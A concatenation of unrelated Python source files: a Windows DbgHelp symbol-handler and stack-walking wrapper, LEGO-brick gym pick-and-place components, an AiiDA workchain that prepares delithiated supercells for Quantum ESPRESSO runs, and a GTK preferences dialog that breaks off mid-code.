self.new_typeid(self._get_type_info(gdef.TI_GET_TYPEID)) @property def basetype(self): return gdef.BasicType.mapper[self._get_type_info(gdef.TI_GET_BASETYPE)] @property def datakind(self): return gdef.DataKind.mapper[self._get_type_info(gdef.TI_GET_DATAKIND)] @property def udtkind(self): return gdef.UdtKind.mapper[self._get_type_info(gdef.TI_GET_UDTKIND)] @property def offset(self): return self._get_type_info(gdef.TI_GET_OFFSET) @property def nb_children(self): return self._get_type_info(gdef.TI_GET_CHILDRENCOUNT) @property def children(self): count = self.nb_children class res_struct(ctypes.Structure): _fields_ = [("Count", gdef.ULONG), ("Start", gdef.ULONG), ("Types", (gdef.ULONG * count))] x = res_struct() x.Count = count x.Start = 0 self._get_type_info(gdef.TI_FINDCHILDREN, x) return [self.new_typeid(ch) for ch in x.Types] # Constructor @classmethod def from_symbol_info(cls, syminfo, resolver): return cls(syminfo.TypeIndex, syminfo.ModBase, resolver) # Constructor def new_typeid(self, newtypeid): return type(self)(newtypeid, self.modbase, self.resolver) def __repr__(self): if self.tag == gdef.SymTagBaseType: return '<{0} {1}>'.format(type(self).__name__, self.basetype) return '<{0} name="{1}" tag={2}>'.format(type(self).__name__, self.name, self.tag) class SymbolModule(gdef.IMAGEHLP_MODULE64): # Init on ctypes struct is not always called # resolver should be set manually def __init__(self, resolver): self.resolver = resolver @property def addr(self): return self.BaseOfImage @property def name(self): return self.ModuleName @property def path(self): return self.LoadedImageName @property def type(self): return self.SymType @property def pdb(self): LoadedPdbName = self.LoadedPdbName if not LoadedPdbName: return None return LoadedPdbName def __repr__(self): pdb_basename = self.LoadedPdbName.split("\\")[-1] return '<{0} name="{1}" type={2} pdb="{3}" addr={4:#x}>'.format(type(self).__name__, self.name, self.type.value.name, pdb_basename, self.addr) # https://docs.microsoft.com/en-us/windows/win32/debug/symbol-handler-initialization class SymbolHandler(object): """Base class of symbol handler""" INIT_SYMBOL_OPTION = False def __init__(self, handle, search_path=None, invade_process=False): # https://docs.microsoft.com/en-us/windows/desktop/api/dbghelp/nf-dbghelp-syminitialize # This value should be unique and nonzero, but need not be a process handle. # be sure to use the correct handle. self.handle = handle if not SymbolHandler.INIT_SYMBOL_OPTION: # Normally the first real call to DbgHelp -> setup our options # Should check if SymSetOptions was not called by someone else # windows.winproxy.SymSetOptions(DEFAULT_DBG_OPTION) SymbolHandler.INIT_SYMBOL_OPTION = True winproxy.SymInitialize(handle, search_path, invade_process) # Config # def get_search_path(): ? # Loading def load_module(self, file_handle=None, path=None, name=None, addr=0, size=0, data=None, flags=0): # Is that a bug in SymLoadModuleEx ? # To get a custom name for a module it use "path" # So we need to use file_handle and set a custom path # ! BUT it means we cannot get a custom name for a module where the path is not explicit and need to be searched if name is not None and file_handle is None and os.path.exists(path): try: f = open(path) file_handle = windows.utils.get_handle_from_file(f) path = name except Exception as e: pass try: load_addr = winproxy.SymLoadModuleEx(self.handle, file_handle, path, name, addr, size, data, flags) except WindowsError as e: # if e.winerror == 0: # Already loaded ? # What if someone try to load another PE at the same BaseOfDll ? # return BaseOfDll raise return self.get_module(load_addr) def load_file(self, path, name=None, addr=0, size=0, data=None, flags=0): return self.load_module(path=path, name=name, addr=addr, size=size, data=data, flags=flags) def unload(self, addr): return winproxy.SymUnloadModule64(self.handle, addr) @staticmethod @ctypes.WINFUNCTYPE(gdef.BOOL, gdef.PCSTR, gdef.DWORD64, ctypes.py_object) def modules_aggregator(modname, modaddr, ctx): ctx.append(modaddr) return True @property def modules(self): res = [] windows.winproxy.SymEnumerateModules64(self.handle, self.modules_aggregator, res) return [self.get_module(addr) for addr in res] def get_module(self, base): modinfo = SymbolModule(self) modinfo.SizeOfStruct = ctypes.sizeof(modinfo) winproxy.SymGetModuleInfo64(self.handle, base, modinfo) return modinfo def symbol_and_displacement_from_address(self, addr): displacement = gdef.DWORD64() max_len_size = 0x1000 full_size = ctypes.sizeof(SymbolInfo) + (max_len_size - 1) buff = windows.utils.BUFFER(SymbolInfo)(size=full_size) sym = buff[0] sym.SizeOfStruct = ctypes.sizeof(SymbolInfo) sym.MaxNameLen = max_len_size winproxy.SymFromAddr(self.handle, addr, displacement, buff) # SymFromAddrW ? sym.resolver = self sym.displacement = displacement.value return sym # Keep it ? # def get_symbol(self, addr): # return self.symbol_and_displacement_from_address(addr) def symbol_from_name(self, name): max_len_size = 0x1000 full_size = ctypes.sizeof(SymbolInfo) + (max_len_size - 1) buff = windows.utils.BUFFER(SymbolInfo)(size=full_size) sym = buff[0] sym.SizeOfStruct = ctypes.sizeof(SymbolInfo) sym.MaxNameLen = max_len_size windows.winproxy.SymFromName(self.handle, name, buff) sym.resolver = self sym.displacement = 0 return sym def resolve(self, name_or_addr): # Only returns None if symbol is not Found ? if isinstance(name_or_addr, basestring): return self.symbol_from_name(name_or_addr) try: return self.symbol_and_displacement_from_address(name_or_addr) except WindowsError as e: if e.winerror != gdef.ERROR_MOD_NOT_FOUND: raise # We could not resolve and address -> return None return None __getitem__ = resolve @staticmethod @ctypes.WINFUNCTYPE(gdef.BOOL, ctypes.POINTER(SymbolInfo), gdef.ULONG , ctypes.py_object) def simple_aggregator(info, size, ctx): sym = info[0] fullsize = sym.SizeOfStruct + sym.NameLen cpy = windows.utils.BUFFER(SymbolInfo)(size=fullsize) ctypes.memmove(cpy, info, fullsize) ctx.append(cpy[0]) return True def search(self, mask, mod=0, tag=0, options=gdef.SYMSEARCH_ALLITEMS, callback=None): res = [] if callback is None: callback = self.simple_aggregator else: callback = ctypes.WINFUNCTYPE(gdef.BOOL, ctypes.POINTER(SymbolInfo), gdef.ULONG , ctypes.py_object)(callback) windows.winproxy.SymSearch(self.handle, gdef.DWORD64(mod), 0, tag, mask, 0, callback, res, options) for sym in res: sym.resolver = self sym.displacement = 0 return res def get_symbols(self, addr, callback=None): res = [] if callback is None: callback = self.simple_aggregator else: callback = ctypes.WINFUNCTYPE(gdef.BOOL, ctypes.POINTER(SymbolInfo), gdef.ULONG , ctypes.py_object)(callback) try: windows.winproxy.SymEnumSymbolsForAddr(self.handle, addr, callback, res) except WindowsError as e: if e.winerror == gdef.ERROR_MOD_NOT_FOUND: return [] raise for sym in res: sym.resolver = self sym.displacement = 0 return res # Type stuff def get_type(self, name, mod=0): max_len_size = 0x1000 full_size = ctypes.sizeof(SymbolInfo) + (max_len_size - 1) buff = windows.utils.BUFFER(SymbolInfo)(size=full_size) buff[0].SizeOfStruct = ctypes.sizeof(SymbolInfo) buff[0].MaxNameLen = max_len_size windows.winproxy.SymGetTypeFromName(self.handle, mod, name, buff) return SymbolType.from_symbol_info(buff[0], resolver=self) # SymbolInfo info ? # def type_info(self, mod, typeid, typeinfo, ires=None): # res = ires # if res is None: # res = TST_TYPE_RES_TYPE.get(typeinfo, gdef.DWORD)() # windows.winproxy.SymGetTypeInfo(self.handle, mod, typeid, typeinfo, ctypes.byref(res)) # if ires is not None: # return ires # newres = res.value # if isinstance(res, gdef.LPWSTR): # windows.winproxy.LocalFree(res) # return newres class StackWalker(object): def __init__(self, resolver, process=None, thread=None, context=None): self.resolver = resolver if process is None and thread is None: raise ValueError("At least a process or thread must be provided") if process is None: process = thread.owner self.process = process self.thread = thread self.context = context if windows.current_process.bitness == 32 and process.bitness == 64: raise NotImplementedError("StackWalking 64b does not seems to works from 32b process") def _stack_frame_generator(self): ctx, machine = self._get_effective_context_and_machine() frame = self._setup_initial_frame_from_context(ctx, machine) thread_handle = self.thread.handle if self.thread else None while True: try: windows.winproxy.StackWalkEx(machine, # dbg.current_process.handle, self.resolver.handle, thread_handle, # 0, frame, ctypes.byref(ctx), None, winproxy.resolve(winproxy.SymFunctionTableAccess64), winproxy.resolve(winproxy.SymGetModuleBase64), None, 0) except WindowsError as e: if not e.winerror: return # No_ERROR -> end of stack walking raise yield type(frame).from_buffer_copy(frame) # Make a copy ? def __iter__(self): return self._stack_frame_generator() # Autorise to force the retrieving of 32b stack when code is currently on 64b code ? def _get_effective_context_and_machine(self): ctx = self.context or self.thread.context if self.process.bitness == 32: # Process is 32b, so the context is inevitably x86 return (ctx, gdef.IMAGE_FILE_MACHINE_I386) if windows.current_process.bitness == 32: # If we are 32b, we will only be able to handle x86 stack # ctx is obligatory a 32b one, as the case us32/target64 is handled # in __init__ with a NotImplementedError return (ctx, gdef.IMAGE_FILE_MACHINE_I386) if self.process.bitness == 64: # Process is 64b, so the context is inevitably x64 return (ctx, gdef.IMAGE_FILE_MACHINE_AMD64) # Thing get a little more complicated here :) # We are a 64b process and target is 32b. # So we must find-out if we are in 32 or 64b world at the moment. # The context_syswow.SegCS give us the information # The context32.SegCs would be always 32 ctxsyswow = dbg.current_thread.context_syswow if ctxsyswow.SegCs == gdef.CS_USER_32B: return (ctx, gdef.IMAGE_FILE_MACHINE_I386) return (ctxsyswow, gdef.IMAGE_FILE_MACHINE_AMD64) def _setup_initial_frame_from_context(self, ctx, machine): frame = gdef.STACKFRAME_EX() frame.AddrPC.Mode = gdef.AddrModeFlat frame.AddrFrame.Mode = gdef.AddrModeFlat frame.AddrStack.Mode = gdef.AddrModeFlat frame.AddrPC.Offset = ctx.pc frame.AddrStack.Offset = ctx.sp if machine == gdef.IMAGE_FILE_MACHINE_I386: frame.AddrFrame.Offset = ctx.Ebp # Need RBP on 64b ? return frame class VirtualSymbolHandler(SymbolHandler): """A SymbolHandler where its handle is not a valid process handle Allow to create/resolve symbol in a 'virtual' process But all API needing a real process handle will fail """ VIRTUAL_HANDLER_COUNTER = itertools.count(0x11223344) def __init__(self, search_path=None): handle = next(self.VIRTUAL_HANDLER_COUNTER) super(VirtualSymbolHandler, self).__init__(handle, search_path, False) # The VirtualSymbolHandler is not based on an existing process # So load() in its simplest for should just take the path of the file to load load = SymbolHandler.load_file def refresh(self): # Do nothing on a VirtualSymbolHandler return False class ProcessSymbolHandler(SymbolHandler): def __init__(self, process, search_path=None, invade_process=False): super(ProcessSymbolHandler, self).__init__(process.handle, search_path, invade_process) self.target = process # The ProcessSymbolHandler is based on an existing process # So load() in its simplest form should be able to load the symbol for an existing # module that is already loaded # Question: should be able to load other module at other address ? def load(self, name): mods = [x for x in self.target.peb.modules if x.name == name] if not mods: raise ValueError("Could not find module <{0}>".format(name)) assert len(mods) == 1 # Load all if multiple match ? mod = mods[0] return self.load_module(addr=mod.baseaddr, path=mod.fullname) def refresh(self): return windows.winproxy.SymRefreshModuleList(self.handle) def stackwalk(self, ctx): pass class SymbolEngine(object): def set_options(self, options): return windows.winproxy.SymSetOptions(options) def get_options(self): return windows.winproxy.SymGetOptions() options = property(get_options, set_options) engine = SymbolEngine() TST_TYPE_RES_TYPE = { gdef.TI_GET_SYMNAME: gdef.LPWSTR, gdef.TI_GET_LENGTH: gdef.ULONG64, gdef.TI_GET_ADDRESS: gdef.ULONG64, gdef.TI_GTIEX_REQS_VALID: gdef.ULONG64, gdef.TI_GET_SYMTAG: gdef.SymTagEnum, } # class ProcessSymbolResolver(SymbolResolver): # def load_all(self): # result = [] # for mod in self.target.peb.modules: # try: # result.append(self.load_module(BaseOfDll=mod.baseaddr, ImageName=mod.fullname)) # except WindowsError as e: # # Already loaded: ignore the error # if e.winerror == gdef.ERROR_SUCCESS: # continue # return result import math import numpy from pyquaternion import Quaternion from ltron.gym.components.ltron_gym_component import LtronGymComponent from gym.spaces import ( Discrete, Tuple, Dict, MultiDiscrete ) from ltron.gym.spaces import ( SinglePixelSelectionSpace, ) from ltron.geometry.utils import matrix_is_mirrored from ltron.geometry.collision import check_collision class HandspacePickAndPlace(LtronGymComponent): def __init__(self, workspace_scene_component, workspace_pos_snap_component, workspace_neg_snap_component, handspace_scene_component, handspace_pos_snap_component, handspace_neg_snap_component, check_collisions=False, ): self.workspace_scene_component = workspace_scene_component self.workspace_pos_snap_component = workspace_pos_snap_component self.workspace_neg_snap_component = workspace_neg_snap_component self.handspace_scene_component = handspace_scene_component self.handspace_pos_snap_component = handspace_pos_snap_component self.handspace_neg_snap_component = handspace_neg_snap_component self.check_collisions = check_collisions self.workspace_width = self.workspace_pos_snap_component.width self.workspace_height = self.workspace_pos_snap_component.height self.handspace_width = self.handspace_pos_snap_component.width self.handspace_height = self.handspace_pos_snap_component.height activate_space = Discrete(2) polarity_space = Discrete(2) pick_space = SinglePixelSelectionSpace( self.handspace_width, self.handspace_height) place_space = SinglePixelSelectionSpace( self.workspace_width, self.workspace_height) place_at_origin_space = Discrete(2) self.observation_space = Dict({'success':Discrete(2)}) self.action_space = Dict({ 'activate':activate_space, 'polarity':polarity_space, 'pick':pick_space, 'place':place_space, 'place_at_origin':place_at_origin_space, }) def reset(self): return {'success':False} def step(self, action): activate = action['activate'] if not activate: return {'success':False}, 0., False, {} polarity = action['polarity'] pick_y, pick_x = action['pick'] place_y, place_x = action['place'] place_at_origin = action['place_at_origin'] if polarity == 1: pick_map = self.handspace_pos_snap_component.observation place_map = self.workspace_neg_snap_component.observation else: pick_map = self.handspace_neg_snap_component.observation place_map = self.workspace_pos_snap_component.observation try: pick_instance_id, pick_snap_id = pick_map[pick_y, pick_x] except IndexError: pick_instance_id = 0 try: place_instance_id, place_snap_id = place_map[place_y, place_x] except IndexError: place_instance_id = 0 if pick_instance_id == 0: return {'success':0}, 0, False, None if place_instance_id == 0 and not place_at_origin: return {'success':0}, 0, False, None workspace_scene = self.workspace_scene_component.brick_scene handspace_scene = self.handspace_scene_component.brick_scene pick_instance = handspace_scene.instances[pick_instance_id] pick_brick_shape = pick_instance.brick_shape pick_brick_color = pick_instance.color brick_shape_snap = pick_brick_shape.snaps[pick_snap_id] brick_shape_snap_transform = brick_shape_snap.transform if matrix_is_mirrored(brick_shape_snap_transform): brick_shape_snap_transform[0:3,0] *= -1 workspace_view_matrix = workspace_scene.get_view_matrix() handspace_view_matrix = handspace_scene.get_view_matrix() best_workspace_transform = None best_pseudo_angle = -float('inf') for i in range(4): angle = i * math.pi / 2 rotation = Quaternion(axis=(0,1,0), angle=angle) workspace_transform = ( workspace_scene.upright @ rotation.transformation_matrix @ numpy.linalg.inv(brick_shape_snap_transform) ) handspace_camera_local = ( handspace_view_matrix @ pick_instance.transform) workspace_camera_local = ( workspace_view_matrix @ workspace_transform) offset = ( workspace_camera_local @ numpy.linalg.inv(handspace_camera_local) ) pseudo_angle = numpy.trace(offset[:3,:3]) if pseudo_angle > best_pseudo_angle: best_pseudo_angle = pseudo_angle best_workspace_transform = workspace_transform new_brick = workspace_scene.add_instance( str(pick_brick_shape), pick_brick_color, best_workspace_transform, ) if place_at_origin: if self.check_collisions: collision = workspace_scene.check_snap_collision( [new_brick], new_brick.get_snap(pick_snap_id)) if collision: workspace_scene.remove_instance(new_brick) success = False else: success = True else: success = True else: workspace_scene.pick_and_place_snap( (new_brick.instance_id, pick_snap_id), (place_instance_id, place_snap_id), ) if self.check_collisions: collision = workspace_scene.check_snap_collision( [new_brick], new_brick.get_snap(pick_snap_id)) if collision: workspace_scene.remove_instance(new_brick) success = False else: success = True else: success = True if success: handspace_scene.clear_instances() return {'success':success}, 0., False, {} def no_op_action(self): return { 'activate':0, 'polarity':0, 'pick':numpy.array([0,0]), 'place':numpy.array([0,0]), 'place_at_origin':0, } class CursorHandspacePickAndPlace(LtronGymComponent): def __init__(self, workspace_scene_component, workspace_cursor_component, handspace_scene_component, handspace_cursor_component, check_collisions=False, ): self.workspace_scene_component = workspace_scene_component self.workspace_cursor_component = workspace_cursor_component self.handspace_scene_component = handspace_scene_component self.handspace_cursor_component = handspace_cursor_component self.check_collisions = check_collisions self.observation_space = Dict({'success':Discrete(2)}) self.action_space = Discrete(3) def reset(self): return {'success':False} def step(self, action): if not action: return {'success':False}, 0., False, {} place_at_origin = action == 2 pick_instance_id = self.handspace_cursor_component.instance_id pick_snap_id = self.handspace_cursor_component.snap_id place_instance_id = self.workspace_cursor_component.instance_id place_snap_id = self.workspace_cursor_component.snap_id if pick_instance_id == 0: return {'success':0}, 0, False, None if place_instance_id == 0 and not place_at_origin: return {'success':0}, 0, False, None workspace_scene = self.workspace_scene_component.brick_scene handspace_scene = self.handspace_scene_component.brick_scene pick_instance = handspace_scene.instances[pick_instance_id] pick_brick_shape = pick_instance.brick_shape pick_brick_color = pick_instance.color brick_shape_snap = pick_brick_shape.snaps[pick_snap_id] brick_shape_snap_transform = brick_shape_snap.transform if matrix_is_mirrored(brick_shape_snap_transform): brick_shape_snap_transform[0:3,0] *= -1 workspace_view_matrix = workspace_scene.get_view_matrix() handspace_view_matrix = handspace_scene.get_view_matrix() transferred_transform = ( numpy.linalg.inv(workspace_view_matrix) @ handspace_view_matrix @ pick_instance.transform ) new_brick = workspace_scene.add_instance( str(pick_brick_shape), pick_brick_color, transferred_transform, ) if place_at_origin: place = None else: place = (place_instance_id, place_snap_id) success = workspace_scene.pick_and_place_snap( (new_brick.instance_id, pick_snap_id), place, check_collisions=self.check_collisions, ) if success: handspace_scene.clear_instances() else: workspace_scene.remove_instance(new_brick) return {'success':success}, 0, False, None def no_op_action(self): return 0 class PickAndPlace(LtronGymComponent): def __init__(self, scene, pos_snap_render, neg_snap_render, check_collisions ): self.scene_component = scene self.action_executed = 0 self.pos_snap_render = pos_snap_render self.neg_snap_render = neg_snap_render self.width = self.pos_snap_render.width self.height = self.pos_snap_render.height self.check_collisions = check_collisions assert self.neg_snap_render.width == self.width assert self.neg_snap_render.height == self.height activate_space = Discrete(2) polarity_space = Discrete(2) pick_space = SinglePixelSelectionSpace(self.width, self.height) place_space = SinglePixelSelectionSpace(self.width, self.height) self.action_space = Dict({ 'activate':activate_space, 'polarity':polarity_space, 'pick':pick_space, 'place':place_space, }) self.observation_space = Dict({'success': Discrete(2)}) def reset(self): return {'success':False} def step(self, action): #if action is None: return None, 0, False, None #polarity = action[0] # Integer, 0 or 1 # pick_x, pick_y = action[1]+100, action[2]+100 # a tuple, corresponding to the coordinate of pick location # place_x, place_y = action[3]+150, action[4]+150 # a tuple, corresponding to the coordinate of place location #pick_x, pick_y = action[1], action[2] #place_x, place_y = action[3], action[4] #activate, polarity, pick, place = action activate = action['activate'] if not activate: return {'success': 0}, 0., False, {} polarity = action['polarity'] pick_y, pick_x = action['pick'] place_y, place_x = action['place'] if polarity == 1: pick_map = self.pos_snap_render.observation place_map = self.neg_snap_render.observation else: pick_map = self.neg_snap_render.observation place_map = self.pos_snap_render.observation pick_instance, pick_id = pick_map[pick_y, pick_x] place_instance, place_id = place_map[place_y, place_x] # if check_collision(self.scene_component.brick_scene, pick_instance, abs(polarity - 1), (self.width, self.height)): # return {'pick_place_succeed': 0}, 0, False, None if pick_instance == 0 and pick_id == 0: return {'success' : 0}, 0, False, None if place_instance == 0 and place_id == 0: return {'success' : 0}, 0, False, None if pick_instance == place_instance: return {'success' : 0}, 0, False, None if self.check_collisions: instance = self.scene_component.brick_scene.instances[pick_instance] initial_transform = instance.transform snap = instance.get_snap(pick_id) collision = self.scene_component.brick_scene.check_snap_collision( [instance], snap) if collision: self.scene_component.brick_scene.move_instance( instance, initial_transform) return {'success': 0}, 0, False, None place_instance = self.scene_component.brick_scene.instances[place_instance] self.scene_component.brick_scene.pick_and_place_snap( (pick_instance, pick_id), (place_instance, place_id)) collision = self.scene_component.check_snap_collision( [instance], snap) if collision: self.scene_component.brick_scene.move_instance( instance, initial_transform) return {'success': 0}, 0, False, None else: return {'success': 1}, 0, False, None else: self.scene_component.brick_scene.pick_and_place_snap( (pick_instance, pick_id), (place_instance, place_id)) return {'success' : 1}, 0, False, None # the observation is whether the action succeeds or not def no_op_action(self): return { 'activate':0, 'polarity':0, 'pick':numpy.array([0,0]), 'place':numpy.array([0,0]), } aiida_flipper/workflows/preprocess.py # -*- coding: utf-8 -*- from aiida import orm from aiida.engine.processes.workchains.workchain import WorkChain from aiida_quantumespresso.workflows.protocols.utils import ProtocolMixin from aiida.common import AttributeDict, exceptions from aiida.plugins import WorkflowFactory from aiida.engine import ToContext, if_, ExitCode, append_ from aiida_quantumespresso.utils.mapping import prepare_process_inputs from aiida_quantumespresso.common.types import ElectronicType from aiida.common.datastructures import StashMode PwBaseWorkChain = WorkflowFactory('quantumespresso.pw.base') def make_supercell(structure, distance): from supercellor import supercell as sc pym_sc_struct = sc.make_supercell(structure.get_pymatgen_structure(), distance, verbosity=0, do_niggli_first=False)[0] sc_struct = orm.StructureData() sc_struct.set_extra('original_unitcell', structure.uuid) sc_struct.set_pymatgen(pym_sc_struct) return sc_struct def delithiate_structure(structure, element_to_remove): """ Take the input structure and create two structures from it. One structure is flipper_compatible/pinball_structure which is essentially the same structure, just that Li is on first places both in kinds and sites as required for the flipper; the other structure has no Lithium """ assert isinstance(structure, orm.StructureData), "input structure needs to be an instance of {}".format(orm.StructureData) pinball_kinds = [kind for kind in structure.kinds if kind.symbol == element_to_remove] kindnames_to_delithiate = [kind.name for kind in pinball_kinds] non_pinball_kinds = [k for i,k in enumerate(structure.kinds) if k.symbol != element_to_remove] non_pinball_sites = [s for s in structure.sites if s.kind_name not in kindnames_to_delithiate] pinball_sites = [s for s in structure.sites if s.kind_name in kindnames_to_delithiate] delithiated_structure = orm.StructureData() pinball_structure = orm.StructureData() delithiated_structure.set_cell(structure.cell) delithiated_structure.set_attribute('delithiated_structure', True) delithiated_structure.set_attribute('missing_Li', len(pinball_sites)) pinball_structure.set_cell(structure.cell) pinball_structure.set_attribute('pinball_structure', True) pinball_structure.set_extra('original_unitcell', structure.extras['original_unitcell']) pinball_structure.set_attribute('original_unitcell', structure.extras['original_unitcell']) [pinball_structure.append_kind(_) for _ in pinball_kinds] [pinball_structure.append_site(_) for _ in pinball_sites] [pinball_structure.append_kind(_) for _ in non_pinball_kinds] [pinball_structure.append_site(_) for _ in non_pinball_sites] [delithiated_structure.append_kind(_) for _ in non_pinball_kinds] [delithiated_structure.append_site(_) for _ in non_pinball_sites] delithiated_structure.label = delithiated_structure.get_formula(mode='count') pinball_structure.label = pinball_structure.get_formula(mode='count') return dict(pinball_structure=pinball_structure, delithiated_structure=delithiated_structure) class PreProcessWorkChain(ProtocolMixin, WorkChain): """ WorkChain that takes a primitive structure as its input and makes supercell using Supercellor class, makes the pinball and delithiated structures and then performs an scf calculation on the host lattice, stashes the charge densities and wavefunctions. It outputs the pinball supercell and RemoteData containing charge densities to be used in all future workchains for performing MD. """ @classmethod def define(cls, spec): super().define(spec) spec.expose_inputs(PwBaseWorkChain, namespace='prepro', exclude=('clean_workdir', 'pw.structure', 'pw.parent_folder'), namespace_options={'help': 'Inputs for the `PwBaseWorkChain` for running the scf on host lattice.'}) spec.input('clean_workdir', valid_type=orm.Bool, help='If `True`, work directories of all called calculation will be cleaned at the end of execution.') spec.input('distance', valid_type=orm.Float, help='The minimum image distance as a float, the cell created will not have any periodic image below this distance.') spec.input('element_to_remove', valid_type=orm.Str, help='The element that will become the pinball, typically Lithium.') spec.input('stash_directory', valid_type=orm.Str, required=False, help='The location where host lattice charge denisites will be stored.') spec.input('structure', valid_type=orm.StructureData, required=True, help='The primitive structure that is used to build the supercell for MD simulations.') spec.outline( cls.supercell, cls.setup, cls.run_scf, cls.inspect_scf, cls.result) spec.output('pinball_supercell', valid_type=orm.StructureData, help='The Pinball/Flipper compatible structure onto which MD will be run.') spec.output('host_lattice_scf_output', valid_type=orm.RemoteData, help='The node containing the symbolic link to the stashed charged densities.') spec.exit_code(611, 'ERROR_SCF_FINISHED_WITH_ERROR', message='Host Lattice pw scf calculation finished but with some error code.') spec.exit_code(612, 'ERROR_SCF_FAILED', message='Host Lattice pw scf calculation did not finish.') spec.exit_code(613, 'ERROR_KPOINTS_NOT_SPECIFIED', message='Only gamma or automatic kpoints argument is allowed.') def supercell(self): # Create the supercells and store the pinball/flipper structure and delithiated structure in a dictionary if self.inputs.distance == 0: sc_struct = self.inputs.structure else: sc_struct = make_supercell(self.inputs.structure, self.inputs.distance) self.ctx.supercell = delithiate_structure(sc_struct, self.inputs.element_to_remove) def setup(self): """Input validation and context setup.""" # I store all the input dictionaries in context variables self.ctx.preprocess_inputs = AttributeDict(self.exposed_inputs(PwBaseWorkChain, namespace='prepro')) self.ctx.preprocess_inputs.pw.parameters = self.ctx.preprocess_inputs.pw.parameters.get_dict() self.ctx.preprocess_inputs.pw.settings = self.ctx.preprocess_inputs.pw.settings.get_dict() if not self.ctx.preprocess_inputs.pw.settings['gamma_only']: return self.exit_codes.ERROR_KPOINTS_NOT_SPECIFIED @classmethod def get_protocol_filepath(cls): """Return ``pathlib.Path`` to the ``.yaml`` file that defines the protocols.""" from importlib_resources import files from aiida_flipper.workflows import protocols as proto return files(proto) / 'preprocess.yaml' @classmethod def get_builder_from_protocol( cls, code, structure, distance, element_to_remove=None, stash_directory=None, protocol=None, overrides=None, **kwargs ): """Return a builder prepopulated with inputs selected according to the chosen protocol. :param code: the ``Code`` instance configured for the ``quantumespresso.pw`` plugin. :param structure: the ``StructureData`` instance to use. :param distance: the ``distance`` used to make supercells, if distance is 0 I assume to take it as supercell and do not generate another supercell, do NOT change it after calling the builder :param elemet_to_remove: the ``element`` treated as pinball in the model, do NOT change it after calling the builder :param stash_directory: the ``path`` where the charge densities of host lattice are stored :param protocol: protocol to use, if not specified, the default will be used. :param overrides: optional dictionary of inputs to override the defaults of the protocol. :param kwargs: additional keyword arguments that will be passed to the ``get_builder_from_protocol`` of all the sub processes that are called by this workchain. :return: a process builder instance with all inputs defined ready for launch. """ inputs = cls.get_protocol_inputs(protocol, overrides) if element_to_remove: element = element_to_remove else: element = inputs['element_to_remove'] if stash_directory: stash = stash_directory else: stash = orm.Str(inputs['stash_directory']) if distance == 0: sc_struct = structure else: sc_struct = make_supercell(structure, distance) supercell = delithiate_structure(sc_struct, element) args = (code, structure, protocol) PwBaseWorkChain = WorkflowFactory('quantumespresso.pw.base') prepro = PwBaseWorkChain.get_builder_from_protocol(*args, electronic_type=ElectronicType.INSULATOR, overrides=inputs['prepro'], **kwargs) prepro['pw'].pop('structure', None) prepro.pop('clean_workdir', None) prepro['pw']['metadata']['options'].update({'stash': {'source_list': ['out', 'aiida.in', 'aiida.out'], 'target_base': stash.value, 'stash_mode': StashMode.COPY.value}}) prepro['pw']['parameters']['SYSTEM']['tot_charge'] = float(-supercell['delithiated_structure'].attributes['missing_Li']) # removing the Li upf data because the input structure of this builder is unitcell with Li, while the input structure of PwBaseWorkChain is delithiated supercell prepro['pw']['pseudos'].pop('Li', None) if 'settings' in inputs['prepro']['pw']: prepro['pw'].settings = orm.Dict(dict=inputs['prepro']['pw']['settings']) if inputs['prepro']['pw']['settings']['gamma_only']: kpoints = orm.KpointsData() kpoints.set_kpoints_mesh([1,1,1]) prepro.kpoints = kpoints else: raise NotImplementedError('Only gamma k-points possible in flipper calculations, so it is recommended to use the same in host lattice calculation.') builder = cls.get_builder() builder.prepro = prepro builder.structure = structure builder.clean_workdir = orm.Bool(inputs['clean_workdir']) builder.distance = orm.Float(distance) builder.element_to_remove = orm.Str(element) return builder def run_scf(self): inputs = self.ctx.preprocess_inputs inputs.pw.structure = self.ctx.supercell['delithiated_structure'] inputs = prepare_process_inputs(PwBaseWorkChain, inputs) running = self.submit(PwBaseWorkChain, **inputs) self.report(f'launching PwBaseWorkChain<{running.pk}>') return ToContext(add_node=running) def inspect_scf(self): # Check if the scf finished properly, and stash the charge densities workchain = self.ctx.add_node if workchain.is_excepted or workchain.is_killed: self.report('Host Lattice scf was excepted or killed') return self.exit_codes.ERROR_SCF_FAILED if workchain.is_failed: self.report(f'Host Lattice scf failed with exit status {workchain.exit_status}') return self.exit_codes.ERROR_SCF_FAILED try: stashed_folder_data = workchain.outputs.remote_stash self.ctx.stashed_data = orm.RemoteData(remote_path=stashed_folder_data.attributes['target_basepath'], computer=stashed_folder_data.computer) except Exception: self.report(f'Host Lattice scf finished with exit status {workchain.exit_status}, but stashed directories not found.') return self.exit_codes.ERROR_SCF_FINISHED_WITH_ERROR def result(self): if self.inputs.distance == 0: self.out('pinball_supercell', self.inputs.structure) else: self.out('pinball_supercell', self.ctx.supercell['pinball_structure']) self.out('host_lattice_scf_output', self.ctx.stashed_data) President-Temitope/gestures import gi gi.require_version('Gtk', '3.0') from gi.repository import Gtk from gestures.configfile import ConfigFileHandler class PreferencesDialog(Gtk.Dialog): def __init__(self,parent, confFile): self.confFile = confFile Gtk.Dialog.__init__(self, "Preferences", parent, 0, Gtk.ButtonsType.NONE) self.set_transient_for(parent) self.set_modal(True) self.set_default_size(480, 100) self.connect("destroy", self.onDestroy) area = self.get_content_area() if(self.confFile.swipe_threshold != None): value = self.confFile.swipe_threshold else: value = 0 box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, margin = 10) area.add(box) label = Gtk.Label("Swipe threshold") slider = Gtk.Scale(orientation=Gtk.Orientation.HORIZONTAL, adjustment=Gtk.Adjustment(value, 0, 100, 5, 10, 0)) slider.connect("value-changed", self.onSwipeThresholdChanged) slider.set_hexpand(True) slider.set_digits(0) box.add(label) box.add(slider) area.show_all() def onSwipeThresholdChanged(self, widget): value = int(widget.get_value()) if(value >= 0 and value <= 100): self.confFile.swipe_threshold = value def onDestroy(self, window): self.confFile.save() class UnsupportedLinesDialog(Gtk.Dialog): def __init__(self, parent, confFile): Gtk.Dialog.__init__(self, "Edit unsupported lines", parent, 0, Gtk.ButtonsType.NONE) self.set_transient_for(parent) self.set_modal(True) self.set_default_size(480, 200) area = self.get_content_area() hb = Gtk.HeaderBar() hb.set_show_close_button(False) cancelButton = Gtk.Button("Cancel") cancelButton.modify_bg(Gtk.StateType.ACTIVE, Gdk.color_parse('red')) hb.pack_start(cancelButton) confirmButton = Gtk.Button("Confirm") confirmButton.modify_bg(Gtk.StateType.ACTIVE, Gdk.color_parse('teal')) hb.pack_end(confirmButton) self.set_titlebar(hb) confirmButton.connect("clicked", self.onConfirm) cancelButton.connect("clicked", 